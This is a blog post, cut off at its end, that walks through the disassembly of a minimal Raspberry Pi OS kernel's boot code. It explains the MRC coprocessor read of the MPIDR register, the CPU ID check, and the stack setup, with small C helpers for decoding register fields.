<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQWVRjQKra5TnVN0DuFmzfreg03qUa3_PipJLRvwvJDMGCUUXp-cthi1k6eGuCRPOlD0piW2Bmmy1DYfGRABhRGJ8V6OLtn6gy5D13znUMNp9t16ImUdPfGlqFujFbJG0nHLoVb9YsI7E/s1600/Screenshot+from+2018-09-12+22-43-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="117" data-original-width="762" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQWVRjQKra5TnVN0DuFmzfreg03qUa3_PipJLRvwvJDMGCUUXp-cthi1k6eGuCRPOlD0piW2Bmmy1DYfGRABhRGJ8V6OLtn6gy5D13znUMNp9t16ImUdPfGlqFujFbJG0nHLoVb9YsI7E/s1600/Screenshot+from+2018-09-12+22-43-02.png" /></a></div>
<br />
That's it for this post, folks. In Part II I'll cover the rest of the ELF header and do some weird stuff with PT_LOAD program headers. Stay tuned!<br />
<h2 style="text-align: left;">
References and Reading</h2>
<ul style="text-align: left;">
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format</a></li>
<li><a href="https://www.amazon.com/Learning-Binary-Analysis-elfmaster-ONeill/dp/1782167102">https://www.amazon.com/Learning-Binary-Analysis-elfmaster-ONeill/dp/1782167102</a></li>
</ul>
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-86532805885106937252018-07-15T00:45:00.000-07:002018-07-15T16:12:16.802-07:00Reversing a bare bones Raspberry Pi Kernel : Branching To the Kernel<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
I lost the first version of this post because of a problem with Blogger's auto-save function.<br />
<br />
Anyway, if you want to get your own Raspberry Pi OS kernel going, I point to some cool posts on that here and expand on them by unpacking some of the assembly code, essentially reverse engineering or "unrolling" the OS. </div>
<div>
<br /></div>
<h2 style="text-align: left;">
Setting up your Development Environment</h2>
<div>
I think the explanation in '<i>Roll your own Raspberry Pi OS</i>' at <a href="https://jsandler18.github.io/">https://jsandler18.github.io/</a> pretty much sorts this out; I can at least confirm that this person's advice definitely does the job, so check it out. The post also covers the background of why we need certain files in the project, such as the linker script and the kernel.c file. As a short summary, here's the basic workflow:<br />
<br />
<h3 style="text-align: left;">
1 - Write a linker script</h3>
</div>
<div>
This tells the linker how to combine the object files built from boot.S and kernel.c into one kernel image.</div>
<div>
<h3 style="text-align: left;">
2 - Write a <span style="font-family: "courier new" , "courier" , monospace;">boot.S</span> </h3>
This file initializes the runtime for your kernel and branches into it.</div>
<div>
<h3 style="text-align: left;">
3 - Write a <span style="font-family: "courier new" , "courier" , monospace;">kernel.c</span> </h3>
This is the actual kernel, which we write in C on top of the runtime that boot.S sets up.
</div>
<div>
<h3 style="text-align: left;">
4 - Compile <span style="font-family: "courier new" , "courier" , monospace;">boot.S</span>, <span style="font-family: "courier new" , "courier" , monospace;">kernel.c</span> </h3>
<br />
Compile each source file into an object file:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEije_2xW7xe_yVcxXiEhmtDVegts0sMLaYti7jYhPa9MTmngrbNCC8K0_dm3Vs76JH_LFLUMMf8B0R7Q7JllUfEDM1rTnYZvqM8z22TvmOzBziVDnksJPXYbqCjKsk6TnOmc5W0Jt60O-M/s1600/1_actions-compile.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="351" data-original-width="1208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEije_2xW7xe_yVcxXiEhmtDVegts0sMLaYti7jYhPa9MTmngrbNCC8K0_dm3Vs76JH_LFLUMMf8B0R7Q7JllUfEDM1rTnYZvqM8z22TvmOzBziVDnksJPXYbqCjKsk6TnOmc5W0Jt60O-M/s1600/1_actions-compile.PNG" /></a></div>
<div>
<br /></div>
<h3 style="text-align: left;">
5 - Link the objects and run your kernel</h3>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4rtOAm4XFzPElkDdpVCPtWA_5ZT3UKfpW0Tp3NKY0_LY5m77w5ooum8NZhfW-JyiIfV1-xsfeOHJdFzpVCdkxprijL-FXKdww_Re0EIx4BLU2OHkJW6PCZkuVsin47svUZVrKE5PW18/s1600/1_actions-link_kernel.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="369" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4rtOAm4XFzPElkDdpVCPtWA_5ZT3UKfpW0Tp3NKY0_LY5m77w5ooum8NZhfW-JyiIfV1-xsfeOHJdFzpVCdkxprijL-FXKdww_Re0EIx4BLU2OHkJW6PCZkuVsin47svUZVrKE5PW18/s1600/1_actions-link_kernel.PNG" /></a></div>
<div>
<br />
<div>
Once you've compiled and launched your own kernel a couple of times, you might want to try reverse engineering it, to make sure you know it at every level of its existence as software. </div>
<div>
<br /></div>
<div>
Let's get started!</div>
</div>
<h2>
Reverse engineering a basic ARM bootloader</h2>
<div>
To get hold of the assembly code for your kernel, invoke the cross-compiled objdump on your kernel image like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPHzQijgIdYM6tu6gNacO1JM9gzNMxiJU__EDfPEFB3HOiLxbe8ysk_aVW73oaTPYK0v-3RxlzKdjOU4gsUYJrtO0fF9AtIgemYYRPx81e4-lNXMn-3LKZ3vXu2wHK76lYCcoWaM0Ggg/s1600/0-objdump-myos.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1503" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPHzQijgIdYM6tu6gNacO1JM9gzNMxiJU__EDfPEFB3HOiLxbe8ysk_aVW73oaTPYK0v-3RxlzKdjOU4gsUYJrtO0fF9AtIgemYYRPx81e4-lNXMn-3LKZ3vXu2wHK76lYCcoWaM0Ggg/s1600/0-objdump-myos.PNG" /></a></div>
<br />
So the first thing we do in the <span style="font-family: "courier new" , "courier" , monospace;"><a href="https://github.com/k3170makan/RaspberryPiOSDev/blob/master/0/boot.S">boot.S</a></span> file is define a couple of labels and import some others; you don't need to worry too much about these, since they are pretty standard linking stuff. I'm more interested in the instructions defined under the .<span style="font-family: "courier new" , "courier" , monospace;">start</span> label, and if you haven't guessed it, this code is what gets the ball rolling.<br />
<br />
The first thing we see there is this weird instruction:<br />
<br />
<blockquote class="tr_bq" style="white-space: pre-wrap; word-wrap: break-word;">
<span style="font-family: "courier new" , "courier" , monospace;">mrc p15,#0,r1,c0,c0,#5</span></blockquote>
<br />
This instruction uses a feature of ARM called "coprocessors". Coprocessors extend the core with functions like cache control, memory management and, on many cores, floating point; exactly what is available depends on the hardware. The documentation says the following about<span style="font-family: "courier new" , "courier" , monospace;"> p15</span>, the coprocessor we are accessing with the MRC instruction:<br />
<br />
<div style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em !important; margin-top: 0.4em !important;">
The CP15 system registers provide control and status information for the functions <b>implemented in the processor</b>. The main functions of the CP15 system registers are:</div>
<div class="itemizedlist" style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;">
<ul compact="compact" style="margin-bottom: 0.2em; margin-top: 0.4em;" type="disc">
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
<b>Overall system control and configuration.</b></div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
<span class="emphasis" style="margin-bottom: 0.2em; margin-top: 0.3em;"><em style="margin-bottom: 0.2em; margin-top: 0.3em;">Memory Management Unit</em></span> (MMU) configuration and management.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
Cache configuration and management.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
Virtualization and security.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
System performance monitoring.</div>
</li>
</ul>
</div>
<br />
To use these features we issue <span style="font-family: "courier new" , "courier" , monospace;">MRC/MCR </span>instructions with some arguments and opcodes: <span style="font-family: "courier new" , "courier" , monospace;">MRC </span>reads a coprocessor register into an ARM register, and <span style="font-family: "courier new" , "courier" , monospace;">MCR </span>writes one. The ARM <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html">documentation</a> describes <span style="font-family: "courier new" , "courier" , monospace;">MRC </span>like this:<br />
<br />
<span style="background-color: white; font-family: "verdana" , "tahoma" , "arial" , "helvetica" , sans-serif; font-size: x-small;">Move to ARM register from coprocessor. Depending on the coprocessor, you might be able to specify various operations in addition.</span><br />
<span style="background-color: white; font-family: "verdana" , "tahoma" , "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
Which doesn't explain much, really. The key point is that it gives access to the coprocessor's functions, and what those functions do depends on how that coprocessor defines them. There's a slightly more helpful Stack Overflow post I found <a href="https://stackoverflow.com/questions/19544694/understanding-mrc-on-arm7">here</a>, which says the following:<br />
<br />
<span style="background-color: white; color: #242729; font-family: "arial" , "helvetica neue" , "helvetica" , sans-serif; font-size: 15px;">MRC stands for "send a command to a coprocessor and get some data back"</span><br />
<br />
So both the command and what you get back depend on the definitions for the specific coprocessor, but the general idea is a fetch-and-do style of command: <i>do stuff for me and return some information</i>. The instruction format needs a little explaining too; here's the general form of MRC:<br />
<br />
<blockquote class="tr_bq" style="background-color: white; color: #333399; margin-bottom: 0.2em; margin-left: 0.5em; margin-top: 0.4em;">
<span style="font-family: "courier new" , "courier" , monospace;"><code class="code">MRC</code>{<em class="replaceable"><code style="color: inherit;">cond</code></em>} <em class="replaceable"><code style="color: inherit;">coproc</code></em>, <em class="replaceable"><code style="color: inherit;">opcode1</code></em>, <em class="replaceable"><code style="color: inherit;">Rd</code></em>, <em class="replaceable"><code style="color: inherit;">CRn</code></em>, <em class="replaceable"><code style="color: inherit;">CRm</code></em>{, <em class="replaceable"><code style="color: inherit;">opcode2</code></em>}</span></blockquote>
<br />
<i>There's a way to execute this conditionally, but I'm going to stick to the unconditional form for now</i>. The coprocessors are numbered <span style="font-family: "courier new" , "courier" , monospace;">p0-p15</span>; here's a breakdown from the ARM documentation of <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/BABJAHDA.html">what they all do</a>. With <span style="font-family: "courier new" , "courier" , monospace;">mrc </span>you read values out of a coprocessor (<span style="font-family: "courier new" , "courier" , monospace;">mcr </span>is the write direction), selecting what to read with <span style="font-family: "courier new" , "courier" , monospace;">opcode1</span> and <span style="font-family: "courier new" , "courier" , monospace;">opcode2</span>, which take small integer values (<i>we will discuss the ones used here below</i>). <span style="font-family: "courier new" , "courier" , monospace;">CRn</span> and <span style="font-family: "courier new" , "courier" , monospace;">CRm</span> name coprocessor registers; again, their meaning is defined in a table (see below). Most importantly for us, <span style="font-family: "courier new" , "courier" , monospace;">Rd </span>is the ARM register that receives the result; our example uses <span style="font-family: "courier new" , "courier" , monospace;">r1</span> to save a copy of the Multiprocessor Affinity Register. Our invocation has <span style="font-family: "courier new" , "courier" , monospace;">opcode1 </span>as 0 and <span style="font-family: "courier new" , "courier" , monospace;">opcode2 </span>as 5 (with <span style="font-family: "courier new" , "courier" , monospace;">CRn</span> and <span style="font-family: "courier new" , "courier" , monospace;">CRm</span> both <span style="font-family: "courier new" , "courier" , monospace;">c0</span>), which according to the documentation means:<br />
<br />
<br />
<table border="1" style="background-color: white; border-collapse: collapse; border-width: 0px; color: black; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;" summary="c0 register summary"><colgroup><col></col><col></col><col></col><col></col><col></col><col></col><col></col></colgroup><thead>
<tr><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">CRn</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Op1</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">CRm</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Op2</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Name</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Reset</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Description</th></tr>
</thead><tbody style="vertical-align: top;">
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">c0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">c0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">MIDR</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-top: 0px !important;">0x410FC075</code></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><div style="margin-bottom: 0.2em;">
<a class="xref" href="http://infocenter.arm.com/help/topic/com.arm.doc.ddi0464f/BABCBFDF.html" style="color: #4f0f8e; text-decoration-line: none;" title="4.3.1. Main ID Register"><i>Main ID Register</i></a></div>
</td></tr>
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"> ...</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td></tr>
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">5</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">MPIDR</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">-<sup style="margin-top: 0px !important;">[<a class="footnote" href="http://infocenter.arm.com/help/topic/com.arm.doc.ddi0464f/BABIGAED.html#ftn.id4787734" id="id4787734" style="color: #4f0f8e; text-decoration-line: none;">a</a>]</sup></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><div style="margin-bottom: 0.2em;">
<a class="xref" href="http://infocenter.arm.com/help/topic/com.arm.doc.ddi0464f/BABHBJCI.html" style="color: #4f0f8e; text-decoration-line: none;" title="4.3.5. Multiprocessor Affinity Register"><i>Multiprocessor Affinity Register</i></a></div>
</td></tr>
</tbody></table>
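The operands above are packed into fixed bit fields of a single 32-bit instruction word, which is what shows up in the objdump output of the kernel image. The sketch below is based on my reading of the A32 MRC encoding in the ARM Architecture Reference Manual, so treat the field layout as an assumption to check against your own manual; the struct and function names are hypothetical. Encoding mrc p15,#0,r1,c0,c0,#5 this way gives 0xEE101FB0.

```c
#include <stdint.h>

/* Assumed A32 layout of MRC:
 *   cond[31:28] 1110[27:24] opc1[23:21] L=1[20] CRn[19:16]
 *   Rt[15:12] coproc[11:8] opc2[7:5] 1[4] CRm[3:0]
 * MCR uses the same layout with bit 20 (L) clear; cond 0xF would be MRC2. */
struct mrc_fields {
    unsigned cond, opc1, crn, rt, coproc, opc2, crm;
};

uint32_t mrc_encode(struct mrc_fields f)
{
    return (uint32_t)(f.cond & 0xF) << 28
         | 0xEu << 24                       /* coprocessor register transfer */
         | (uint32_t)(f.opc1 & 0x7) << 21
         | 1u << 20                         /* L bit: 1 = MRC (read) */
         | (uint32_t)(f.crn & 0xF) << 16
         | (uint32_t)(f.rt & 0xF) << 12
         | (uint32_t)(f.coproc & 0xF) << 8
         | (uint32_t)(f.opc2 & 0x7) << 5
         | 1u << 4
         | (uint32_t)(f.crm & 0xF);
}

/* Returns 1 and fills *out if word has the MRC shape, 0 otherwise. */
int mrc_decode(uint32_t word, struct mrc_fields *out)
{
    if (((word >> 24) & 0xF) != 0xE || !((word >> 20) & 1) || !((word >> 4) & 1))
        return 0;
    out->cond   = word >> 28;
    out->opc1   = (word >> 21) & 0x7;
    out->crn    = (word >> 16) & 0xF;
    out->rt     = (word >> 12) & 0xF;
    out->coproc = (word >> 8) & 0xF;
    out->opc2   = (word >> 5) & 0x7;
    out->crm    = word & 0xF;
    return 1;
}
```

Running mrc_decode over the words in your objdump listing is a quick way to spot every coprocessor read in a kernel image.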
</div>
<div>
<br /></div>
<div>
At the bottom of the Multiprocessor Affinity Register page linked above, the documentation gives the following example, which looks a lot like what we are doing:</div>
<div>
<br /></div>
<div>
<div style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em; margin-top: 0.8em;">
To access the MPIDR, read the CP15 registers with:</div>
<pre class="programlisting" style="background-color: white; color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-left: 0.5em; margin-top: 0.8em;">MRC p15, 0, &lt;Rt&gt;, c0, c0, 5; Read Multiprocessor Affinity Register</pre>
</div>
<div>
<br /></div>
<div>
Our code copies the Multiprocessor Affinity Register's value into <span style="font-family: "courier new" , "courier" , monospace;">r1</span>, most probably to check that one of its fields has a certain value. The documentation describes the register's format as follows:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrLrAhtE0VeaoVBB370-OSnnA41tS3PdKuaVZGHOY8n-7eeMey3-qBCJFqy42gnT3JMLEIAfMUHqL8uy1P2qEG0hgK57WqJ8WMqmKmDGsVRsSK40I0U26vTTp-aVPnhEQFuVJu9Phlmwg/s1600/MDIPR.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="114" data-original-width="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrLrAhtE0VeaoVBB370-OSnnA41tS3PdKuaVZGHOY8n-7eeMey3-qBCJFqy42gnT3JMLEIAfMUHqL8uy1P2qEG0hgK57WqJ8WMqmKmDGsVRsSK40I0U26vTTp-aVPnhEQFuVJu9Phlmwg/s1600/MDIPR.PNG" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
In particular, it describes the CPU ID field (bits [1:0]) like this:</div>
<div>
<br /></div>
<div>
<table border="1" style="background-color: white; border-collapse: collapse; border-width: 0px; color: black; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;" summary="MPIDR bit assignments"><tbody style="vertical-align: top;">
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">[1:0]</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">CPU ID</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><div style="margin-bottom: 0.2em;">
Indicates the processor number in the Cortex-A7 MPCore processor. For:</div>
<div class="itemizedlist">
<ul style="margin-bottom: 0.2em; margin-top: 0.8em;" type="disc">
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
One processor, the CPU ID is <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code>.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
Two processors, the CPU IDs are <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code> and <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x1</code>.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
Three processors, the CPU IDs are <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code>, <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x1</code>, and <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x2</code>.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
Four processors, the CPU IDs are <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code>, <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x1</code>, <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x2</code>, and <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x3</code>.</div>
</li>
</ul>
</div>
</td></tr>
</tbody></table>
</div>
<div>
<br /></div>
<div>
The next instruction ANDs <span style="font-family: "courier new" , "courier" , monospace;">r1</span> with 3.</div>
<div>
It looks like it is using a bit mask to isolate the CPU ID field. If the result is not 3 (both bits set: <span style="font-family: "courier new" , "courier" , monospace;">3 = 11</span> in binary), the core halts. Why check for 3?<i> My current thinking is that this makes sure the kernel runs on only one core, and it picks the last one by checking for ID 3. Changing the #3 literal in boot.S and running the code shows the kernel running a couple of times, i.e. executing the instructions more than once, when you don't make sure you are running on the core whose low two bits are 3.</i><br />
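To make the mask-and-compare concrete, here is a host-side model of the check in C. It only simulates the logic; the compare-with-3-then-halt sequence is my paraphrase of boot.S rather than a copy of it, and the 0x80000000 base value (bit 31 set) used for the four simulated MPIDR readings is an assumption. The function names are hypothetical.

```c
#include <stdint.h>

/* Model of the boot.S core check:
 *   mrc p15, 0, r1, c0, c0, 5   read MPIDR into r1
 *   and r1, r1, #3              keep only the CPU ID, bits [1:0]
 *   compare with the wanted ID, halt if different (assumed sequence)
 * Returns 1 if a core with this MPIDR value would keep running. */
int core_keeps_running(uint32_t mpidr, uint32_t wanted_id)
{
    uint32_t cpu_id = mpidr & 0x3u;   /* the bit mask from the AND */
    return cpu_id == wanted_id;
}

/* Count how many of four cores (CPU IDs 0-3) get past the check.
 * 0x80000000 as the base MPIDR value is an assumption. */
int cores_running(uint32_t wanted_id)
{
    int n = 0;
    for (uint32_t id = 0; id < 4; id++)
        n += core_keeps_running(0x80000000u | id, wanted_id);
    return n;
}
```

With the literal 3, cores_running(3) reports that only the core with CPU ID 3 passes the check in this model.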
<br />
To compare different uses of <span style="font-family: "courier new" , "courier" , monospace;">mrc</span> and the coprocessors, it's a good idea to dig around in other people's kernels and see what they do with this instruction. Here's an example I found on GitHub:</div>
<div>
<br /></div>
<div>
from <a href="https://github.com/dwelch67/raspberrypi">raspberrypi</a>/<a href="https://github.com/dwelch67/raspberrypi/tree/master/boards">boards</a>/<a href="https://github.com/dwelch67/raspberrypi/tree/master/boards/cpuid">cpuid</a>/<b>vector.s</b></div>
<div>
<script src="https://gist.github.com/k3170makan/44a1ee2d066590764f9a05ec98d49d40.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Here's how it uses that value in <a href="https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/cpuid.c">cpuid.c</a>:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG9ru3_-7F3Oe4xIYILHKrCcictuTmi_WQ27rPSljSxNj7BEvpjOCYFJYu4TOdnUTavY6nPBlIKmuNJ5PMN1_OsVlX233Wlu9y_ngKK9VOa5owaU1TfiHapoQ1yyXJUocJaxhVU80TIHU/s1600/getcpuid.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="537" data-original-width="613" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG9ru3_-7F3Oe4xIYILHKrCcictuTmi_WQ27rPSljSxNj7BEvpjOCYFJYu4TOdnUTavY6nPBlIKmuNJ5PMN1_OsVlX233Wlu9y_ngKK9VOa5owaU1TfiHapoQ1yyXJUocJaxhVU80TIHU/s1600/getcpuid.PNG" /></a></div>
<div>
<br /></div>
<div>
Clearly this is being used to determine the board type. I'm not going to delve into the specific value being checked or what it means; to find that out I'd probably need to dig a little deeper into the board data sheets, and my jury is still out on a hard confirmation of what opcode 5 does. Nonetheless, we can be pretty sure this check is there to make sure our code runs on the right board. Moving on!</div>
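<div>
If the value being checked is the Main ID Register (MIDR, which mrc p15, 0, Rd, c0, c0, 0 reads; see the C0 Main ID Register reference below), ARM documents its layout: implementer in bits [31:24], variant in [23:20], architecture in [19:16], primary part number in [15:4] and revision in [3:0]. Below is a minimal C sketch of decoding it, assuming MIDR is the register in play. The struct and function names are hypothetical, and only the cores used on the first three Pi generations are listed.</div>

```c
#include <stdint.h>

/* Fields of the ARM Main ID Register (MIDR). */
typedef struct {
    uint32_t implementer;   /* bits [31:24]; 0x41 = 'A' = ARM Ltd. */
    uint32_t variant;       /* bits [23:20]; major revision ("rN") */
    uint32_t architecture;  /* bits [19:16]; 0xF = described by the CPUID scheme */
    uint32_t part;          /* bits [15:4];  primary part number */
    uint32_t revision;      /* bits [3:0];   minor revision ("pN") */
} midr_fields;

/* Split a raw MIDR value into its fields. */
midr_fields midr_decode(uint32_t midr)
{
    midr_fields f;
    f.implementer  = (midr >> 24) & 0xFFu;
    f.variant      = (midr >> 20) & 0xFu;
    f.architecture = (midr >> 16) & 0xFu;
    f.part         = (midr >> 4)  & 0xFFFu;
    f.revision     =  midr        & 0xFu;
    return f;
}

/* Hypothetical helper: name the ARM cores found on early Pi boards. */
const char *midr_core_name(uint32_t midr)
{
    midr_fields f = midr_decode(midr);
    if (f.implementer != 0x41u)
        return "unknown";
    switch (f.part) {
    case 0xB76: return "ARM1176";     /* Raspberry Pi 1 / Zero */
    case 0xC07: return "Cortex-A7";   /* original Raspberry Pi 2 */
    case 0xD03: return "Cortex-A53";  /* Raspberry Pi 3 */
    default:    return "unknown";
    }
}
```

<div>
For example, an ARM1176 revision r0p7 reports 0x410FB767, which decodes to implementer 0x41, part 0xB76 and revision 7. A board check can then compare just the part number instead of the whole register.</div>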
<div>
<br />
<h2 style="text-align: left;">
Reverse Engineering a basic C run time setup </h2>
<br /></div>
<div>
The next snippet of code looks like this:</div>
<div>
<script src="https://gist.github.com/k3170makan/9ae285019f90c142feca64a6bfcdd239.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">mov sp </span>instruction sets the stack pointer to <span style="font-family: "courier new" , "courier" , monospace;">0x8000</span>. Because the ARM stack grows downward, this places the stack just below our code, which starts at <span style="font-family: "courier new" , "courier" , monospace;">0x8000 </span>(as the disassembly further down shows). As far as I know there's some flexibility in which value you use, but it might also depend on your board type. After that we see an <span style="font-family: "courier new" , "courier" , monospace;">ldr </span>instruction; here is the definition of this operation according to the documentation:</div>
<div>
<div style="text-align: left;">
<br /></div>
<div style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em !important; margin-top: 0.4em !important;">
The <code class="code" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em;">LDR</code> pseudo-instruction loads a register with either:</div>
<div class="itemizedlist" style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;">
<ul compact="compact" style="margin-bottom: 0.2em; margin-top: 0.4em;" type="disc">
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
a 32-bit constant value</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
an address.</div>
</li>
</ul>
</div>
<div style="text-align: left;">
